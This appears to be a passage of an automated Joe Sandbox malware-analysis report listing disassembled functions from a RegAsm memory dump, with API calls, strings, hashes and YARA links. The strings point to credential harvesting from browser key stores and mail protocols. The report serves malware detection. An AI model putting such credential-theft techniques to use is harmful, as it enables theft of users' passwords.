                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                                                                                                                                      Function 004076B7 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004076D7
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407710
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407733
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                                                      • String ID: %s (%s)
                                                                                                                                                                                                                      • API String ID: 3756086014-1363028141
                                                                                                                                                                                                                      • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                                                                                                                                      • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                                                                                                                                      Function 004073EF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscat$memsetsprintf
                                                                                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                                                                                      • API String ID: 125969286-791839006
                                                                                                                                                                                                                      • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                                                                                                                                      • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                                                                                                                                      Function 004091C1 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 004091EC
                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00409201
                                                                                                                                                                                                                        • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                                                                                                                        • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                                                                        • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                                                                                                                      • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                                                                                                      • String ID: caption$dialog_%d
                                                                                                                                                                                                                      • API String ID: 2923679083-4161923789
                                                                                                                                                                                                                      • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                                                                                                                                      • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                                                                                                                                      Function 00426918 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • unknown error, xrefs: 004277B2
                                                                                                                                                                                                                      • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                                                                                                                                                      • no such savepoint: %s, xrefs: 00426A02
                                                                                                                                                                                                                      • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                                                                                                                                                      • abort due to ROLLBACK, xrefs: 00428781
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                                                                                                                                      • API String ID: 3510742995-3035234601
                                                                                                                                                                                                                      • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                                                                                                      • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                                                                                                                                                                      Function 0042B927 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 281COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                      • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                                                      • API String ID: 2221118986-3608744896
                                                                                                                                                                                                                      • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                                                                                                      • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                                                                                                                                                      Function 004429A4 Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 259COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                                                                                                                                                                        • Part of subcall function 0044257F: memcmp.MSVCRT ref: 004425C8
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmpmemcpy
                                                                                                                                                                                                                      • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                                                                                                                      • API String ID: 1784268899-4153596280
                                                                                                                                                                                                                      • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                                                                                                                      • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                                                                                                                                                                                      Function 004101AF Relevance: 9.1, APIs: 6, Instructions: 143COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410246
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00410258
                                                                                                                                                                                                                        • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041033F
                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004103AE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3974772901-0
                                                                                                                                                                                                                      • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                                                                                                                                      • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                                                                                                                                      Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                                                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                                                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                                                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                                                                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                                                        • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                                                                                                                        • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 577244452-0
                                                                                                                                                                                                                      • Opcode ID: ac10a7bfd6aa15ede9b4e30c5e41de0da6501438f2188e8c3f6963eddb478c57
                                                                                                                                                                                                                      • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac10a7bfd6aa15ede9b4e30c5e41de0da6501438f2188e8c3f6963eddb478c57
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                                                                                                                      Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 00404536
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                                                                      • String ID: imap$pop3$smtp
                                                                                                                                                                                                                      • API String ID: 2025310588-821077329
                                                                                                                                                                                                                      • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                                                                                                      • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                                                                                                                      Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C02D
                                                                                                                                                                                                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                                                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                        • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                                                                                                                        • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                                                                                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                                                                                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                                                        • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                      • API String ID: 2726666094-3614832568
                                                                                                                                                                                                                      • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                                                                                                      • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                                                                                                                      Function 00403A61 Relevance: 9.1, APIs: 6, Instructions: 57filestringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403A88
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403AA1
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00403AE9
                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1786725549-0
                                                                                                                                                                                                                      • Opcode ID: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                                                                                                                                      • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89e9c396a026bbeb42c60f6c6870dce76feb575119cfb40fcdc12e2b9f15660d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                                                                                                                                                                      Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 00406151
                                                                                                                                                                                                                        • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                                                                                                                                                                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                                                                                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 0040617C
                                                                                                                                                                                                                      • memcmp.MSVCRT ref: 004061A4
                                                                                                                                                                                                                      • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                      • String ID: global-salt$password-check
                                                                                                                                                                                                                      • API String ID: 231171946-3927197501
                                                                                                                                                                                                                      • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                                                      • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                                                                                                                                      Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                      • Opcode ID: c740e99957d3823e1ca2a26bbc78dd8b4854877f08f504732b6d9e79513b28b3
                                                                                                                                                                                                                      • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c740e99957d3823e1ca2a26bbc78dd8b4854877f08f504732b6d9e79513b28b3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                                                                                                                                      Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                                                                                                                                      • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_23_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 19018683-0
                                                                                                                                                                                                                      • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                                                      • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                                                                                                                                      Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040644F
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                                                                                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                                                                                                                        • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000017.00000002.495638116.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
